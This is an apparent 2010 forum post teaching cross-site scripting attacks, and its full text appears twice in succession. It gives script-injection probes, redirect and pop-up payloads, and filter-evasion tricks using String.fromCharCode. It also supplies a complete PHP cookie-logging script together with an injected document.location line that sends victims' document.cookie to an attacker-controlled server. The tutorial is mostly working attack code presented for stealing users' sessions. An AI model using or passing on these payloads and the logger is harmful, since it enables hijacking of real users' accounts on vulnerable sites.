08-23-2010, 08:03 PM
XSS - Cross Site Scripting
--[ How to find XSS vulnerabilities:
Find something where you can submit text for example a textbox.
Write this inside:
<script>alert("XSS");</script>
If the website is vulnerable it will alert a popup message saying "XSS".
With XSS you can make a picture display on the page if you want:
<IMG SRC="http://website.com/yourimage.png">
Or you can open other websites:
<script>window.open("http://www.google.com/")</script>
Or redirect:
<meta http-equiv="refresh" content="0;url=http://www.google.com/" />
--[ Cookie Stealing:
cookie.php
----------------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
$data = "IP: " . $ip . "\n"
."Cookie: " . $cookie . "\n"
."Referrer: " . $referer . "\n"
."Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 0777);
$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);
@header("Location: $redirect");
?>
----------------------------------------
Upload this file to your server and make a text file "cookies.txt".
Now you must insert this code:
document.location="http://www.site.com/cookie.php?c=" + document.cookie
When the user visits the page that got injected their cookie will be stolen.
--[ How to bypass filteration
<script type=text/javascript>alert("XSS")</script>
<script>alert("/XSS"/)</script>
<script>alert("XSS");</script>
<script>alert("XSS")</script>;
This will alert a popup message saying "123" without using quotes:
<script>var nextlive = 123; alert(nextlive)</script>
Also you can use String.fromCharCode if you don't want to use quotes.
http://www.asciitable.com/
Find the decimal value of what you want to alert at the popup message.
For example:
<script>alert(String.fromCharCode(110, 101, 120, 116, 108, 105, 118, 101))</script>
This will alert a popup message saying "nextlive".
--[ How to find XSS vulnerabilities:
Find something where you can submit text for example a textbox.
Write this inside:
<script>alert("XSS");</script>
If the website is vulnerable it will alert a popup message saying "XSS".
With XSS you can make a picture display on the page if you want:
<IMG SRC="http://website.com/yourimage.png">
Or you can open other websites:
<script>window.open("http://www.google.com/")</script>
Or redirect:
<meta http-equiv="refresh" content="0;url=http://www.google.com/" />
--[ Cookie Stealing:
cookie.php
----------------------------------------
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
$data = "IP: " . $ip . "\n"
."Cookie: " . $cookie . "\n"
."Referrer: " . $referer . "\n"
."Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 0777);
$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);
@header("Location: $redirect");
?>
----------------------------------------
Upload this file to your server and make a text file "cookies.txt".
Now you must insert this code:
document.location="http://www.site.com/cookie.php?c=" + document.cookie
When the user visits the page that got injected their cookie will be stolen.
--[ How to bypass filteration
<script type=text/javascript>alert("XSS")</script>
<script>alert("/XSS"/)</script>
<script>alert("XSS");</script>
<script>alert("XSS")</script>;
This will alert a popup message saying "123" without using quotes:
<script>var nextlive = 123; alert(nextlive)</script>
Also you can use String.fromCharCode if you don't want to use quotes.
http://www.asciitable.com/
Find the decimal value of what you want to alert at the popup message.
For example:
<script>alert(String.fromCharCode(110, 101, 120, 116, 108, 105, 118, 101))</script>
This will alert a popup message saying "nextlive".